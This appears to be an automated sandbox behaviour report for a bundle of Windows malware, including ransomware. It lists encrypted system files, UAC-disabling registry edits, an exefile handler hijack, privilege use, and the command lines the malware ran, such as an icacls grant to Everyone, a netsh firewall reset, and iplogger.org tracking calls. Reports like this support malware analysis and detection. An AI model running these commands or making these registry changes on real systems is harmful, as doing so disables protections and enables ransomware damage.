| File created | C:\Windows\WinSxS\amd64_microsoft-windows-embedded-shelllauncher_31bf3856ad364e35_10.0.22000.120_none_3fbde764cc71982b\WESL_ShellLauncher_uninstall.mof.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-m..nt-browser.appxmain_31bf3856ad364e35_10.0.22000.120_none_f759261c81fa2ed8\r.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.318_none_82292a5c4e657627\FileExplorerExtensions\Assets\images\contrast-black\windows.iconsize.details.svg.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\assembly\GAC_32\Microsoft.Ink\6.1.0.0__31bf3856ad364e35\Microsoft.Ink.dll.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\diagnostics\system\Bluetooth\TS_Main.ps1.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..ouppolicy.resources_31bf3856ad364e35_10.0.22000.132_de-de_756c0b2000ab34ff\f.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\x86_microsoft-windows-b..ager-pcat.resources_31bf3856ad364e35_10.0.22000.348_lt-lt_34c0164794a89822.manifest.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-p..iagnostic.resources_31bf3856ad364e35_10.0.22000.120_th-th_b16776f8926eb568\f\RS_ChangeProcessorState.psd1.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_netfx-aspnet_webadmin_providers_b03f5f7f11d50a3a_10.0.22000.1_none_c81c5f94819d7e78\ManageConsolidatedProviders.aspx.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-web-app-host.resources_31bf3856ad364e35_10.0.22000.348_ko-kr_65df44f99c125960\WWAHost.exe.mui.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\WinSxS\x86_microsoft-windows-ie-timeline_31bf3856ad364e35_11.0.22000.1_none_7ae67646211b62e1\Timeline.dll.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-l..em-ppipro.resources_31bf3856ad364e35_10.0.22000.493_zh-tw_691e7b2407404874.manifest.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\Composition-Core-Package~31bf3856ad364e35~amd64~lv-LV~10.0.22000.184.cat.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-b..buggertransport-usb_31bf3856ad364e35_10.0.22000.1_none_f3c147410f507b43.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_hyperv-vmemulatednic.resources_31bf3856ad364e35_10.0.22000.1_en-us_69800c7fabcd1071.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-w..owsupdatediagnostic_31bf3856ad364e35_10.0.22000.1_none_d30b4b92822a82a9\cl_windowsupdate.ps1.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\WinSxS\Manifests\amd64_hyperv-compute-gues..teservice.resources_31bf3856ad364e35_10.0.22000.1_en-us_e569506b8fe9ebf7.manifest.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\WinSxS\Manifests\wow64_microsoft-windows-i..-ccshared.resources_31bf3856ad364e35_10.0.22000.1_en-us_bde7d8093b1c0cb9.manifest.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-t..icesframework-msctf_31bf3856ad364e35_10.0.22000.282_none_7b3eae3ca88232d7\msctf.dll.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\Boot\Fonts.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..rs-keyboard-desktop_31bf3856ad364e35_10.0.22000.71_none_54a6cc49708e2d95.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\x86_microsoft-windows-l..me-ppipro.resources_31bf3856ad364e35_10.0.22000.493_zh-cn_5acb849c8a0efcf1\f\license.rtf.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.22000.469_none_fdfb724cd2e5c0ff\inclusive-common.css.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\WinSxS\FileMaps\$$_speech_onecore_engines_85d79caefa9ac893.cdf-ms.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\WinSxS\Manifests\wow64_microsoft-windows-ie-offlinefavorites_31bf3856ad364e35_11.0.22000.1_none_f5b5a5c8f5bd43d7.manifest.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-lcphrase-tbl_31bf3856ad364e35_10.0.22000.1_none_3526bc3a759d37ea.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\servicing\Packages\HyperV-Compute-Storage-merged-Package~31bf3856ad364e35~amd64~en-US~10.0.22000.1.mum.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SystemApps\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\Assets\Logo.scale-100.png.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.22000.176_none_fded9bd0d2f09976\appObjectFactory.js.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.318_none_82292a5c4e657627\FileExplorerExtensions\Assets\images\contrast-white\NoDetailsOrPreview.svg.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_winusb.inf.resources_31bf3856ad364e35_10.0.22000.1_en-us_55bcfd207a63126d.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-n..s-package.resources_31bf3856ad364e35_10.0.22000.120_uk-ua_c197e01452d7b8e1\f\LocalizationData.psd1.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\servicing\Packages\HyperV-HvSocket-Package~31bf3856ad364e35~amd64~en-US~10.0.22000.1.mum.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-dafaspinfraprovider_31bf3856ad364e35_10.0.22000.1_none_057e048ea6323b5c.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-g..tallation.resources_31bf3856ad364e35_10.0.22000.1_en-us_f671ae4b278d3a1e\appmgmts.dll.mui.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-scripting-chakra_31bf3856ad364e35_11.0.22000.318_none_028e8a48890a0434.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\WinSxS\Manifests\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_5.82.22000.1_es-mx_3f28231c958e225b.manifest.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..ouppolicy.resources_31bf3856ad364e35_10.0.22000.132_it-it_ab07aa42b9b42e49\f\CloudContent.adml.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-web-app-host.resources_31bf3856ad364e35_10.0.22000.348_es-mx_95a76a97eb16683a\f\WWAHost.exe.mui.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-f..back-courtesyengine_31bf3856ad364e35_10.0.22000.282_none_74f07f6d49ae70dd\f.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.318_none_82292a5c4e657627\r\Public\wsxpacks\Account\assets\__\lib-localization\dist\resources\kn-IN.json.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft.windows.powershell.v3.wsman_31bf3856ad364e35_10.0.22000.1_none_50e44306802cb22a\Microsoft.WSMan.Management.psd1.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\Microsoft-Windows-Server-AppCompat-FoD-Package~31bf3856ad364e35~amd64~gl-ES~10.0.22000.282.mum.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\Microsoft-Windows-UserDeviceRegistration-Package~31bf3856ad364e35~amd64~ar-SA~10.0.22000.258.cat.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.22000.469_none_fdfb724cd2e5c0ff\ssprerror-main.html.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-tcpip-wmiv2provider_31bf3856ad364e35_10.0.22000.1_none_7d961686cedc995c\Test-NetConnection.psm1.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\servicing\Packages\Microsoft-Windows-WindowsMediaPlayer-Troubleshooters-Package~31bf3856ad364e35~amd64~en-US~10.0.22000.1.mum.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SystemApps\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\Assets\StoreLogo.contrast-white_scale-100.png.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.318_none_82292a5c4e657627\FileExplorerExtensions\Assets\images\contrast-white\windows.showdesktop.svg.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-lockapp.appxmain_31bf3856ad364e35_10.0.22000.348_none_e2c7a9ab59285812.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..component.resources_31bf3856ad364e35_10.0.22000.120_et-ee_766bb08343013170\f.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_startupapp-task-data_31bf3856ad364e35_10.0.22000.1_none_9acb42b11a41d6f0.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_netfx4-mscorpe_dll_b03f5f7f11d50a3a_4.0.15806.0_none_8a5f7fe0cdd16f1a.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\lumtru.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\TEMPSP~1.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000_Classes\Local Settings | C:\Users\Admin\Desktop\5.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\TEMPEX~1.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000_Classes\Local Settings | C:\Users\Admin\Desktop\6.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\NOTEPAD.EXE | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Desktop\6.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\as.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Desktop\7.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Java\jdk-1.8\include\bot.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: 33 | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\system32\wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: 33 | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: 33 | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-I5IQQ.tmp\tuc2.tmp | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Java\jdk-1.8\include\bot.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Java\jdk-1.8\include\bot.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Java\jdk-1.8\include\bot.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\Desktop\6.exe | N/A |
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe
"C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe
"x2s443bc.cs1.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\61B7.tmp\61B8.tmp\61B9.bat C:\Users\Admin\Desktop\1.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 184691704838826.bat
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/2bB2s6
C:\Windows\SysWOW64\attrib.exe
attrib +h +s F:\$RECYCLE
C:\Users\Admin\Desktop\10.exe
"C:\Users\Admin\Desktop\10.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\TEMPEX~1.EXE"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\TEMPSP~1.EXE"
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\2.doc" /o ""
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5040 -ip 5040
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1304 -ip 1304
C:\Users\Admin\AppData\Local\TEMPSP~1.EXE
C:\Users\Admin\AppData\Local\TEMPSP~1.EXE
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 320
C:\Users\Admin\Desktop\6.exe
"C:\Users\Admin\Desktop\6.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1304 -s 324
C:\Users\Admin\Desktop\8.exe
"C:\Users\Admin\Desktop\8.exe"
C:\Users\Admin\Desktop\7.exe
"C:\Users\Admin\Desktop\7.exe"
C:\Users\Admin\Desktop\5.exe
"C:\Users\Admin\Desktop\5.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\6E2B.tmp\splitterrypted.vbs
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\9.docm" /o ""
C:\Windows\SysWOW64\wscript.exe
C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Local\Temp\6E2B.tmp\splitterrypted.vbs
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Desktop\3.xlsx"
C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe
C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe --single-argument https://iplogger.org/2bB2s6
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe" --single-argument https://iplogger.org/2bB2s6
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\6FD1.tmp\spwak.vbs
C:\Windows\SysWOW64\wscript.exe
C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Local\Temp\6FD1.tmp\spwak.vbs
C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe
C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe
C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe
C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe
C:\Users\Admin\AppData\Local\TEMPEX~1.EXE
C:\Users\Admin\AppData\Local\TEMPEX~1.EXE
C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
C:\Windows\SysWOW64\cscript.exe
cscript.exe //nologo m.vbs
C:\Windows\SysWOW64\attrib.exe
attrib +h .
C:\Windows\SysWOW64\netsh.exe
C:\Windows\system32\netsh.exe advfirewall reset
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\as.exe"
C:\Users\Admin\AppData\Local\Temp\is-QAP6P.tmp\x2s443bc.cs1.tmp
"C:\Users\Admin\AppData\Local\Temp\is-QAP6P.tmp\x2s443bc.cs1.tmp" /SL5="$30210,15784509,779776,C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\as.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\as.exe
C:\Users\Admin\AppData\Local\Temp\is-NJVTG.tmp\ska2pwej.aeh.tmp
